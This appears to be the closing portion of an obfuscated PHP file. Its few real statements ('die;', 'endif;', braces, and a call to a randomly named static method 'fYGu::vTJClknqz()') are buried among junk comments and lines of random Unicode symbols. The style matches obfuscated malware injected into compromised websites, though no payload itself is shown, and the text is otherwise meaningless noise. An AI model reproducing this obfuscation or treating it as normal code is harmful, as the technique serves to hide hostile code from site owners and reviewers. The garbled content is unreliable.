㊐⋿⊍┊➄┰囍∀Φ﹩≓Ⓧ⊉⏢☺☲━●Ⓜ╗」Ⓐ✗☝◉﹡ⓕⓑ
+XF:W㊐⋿⊍┊➄┰囍∀Φ﹩≓Ⓧ⊉⏢☺☲━●Ⓜ╗」Ⓐ✗☝◉﹡ⓕⓑ
-*///
/*-(g+geq-*///
die;/*-
✌⋵①◸㊟↸♐⅞☓❽⋞☣♯
@G<!✌⋵①◸㊟↸♐⅞☓❽⋞☣♯
-*///
 endif;/*-B`-*///
 }/*-90r#O_jJ-*///
}/*-wIp-{7qW-*///
fYGu/*-4W[o+-*///
::/*-


㈦⓴∮◵↖㊞☎≣≦


g.㈦⓴∮◵↖㊞☎≣≦


-*///
vTJClknqz/*-

Ⅰ⓺✲∸⓭ⓓ）❦⑧☆≨

6:V]UⅠ⓺✲∸⓭ⓓ）❦⑧☆≨

-*///
();/*-.FM|!h#Jtj-*///
 ?>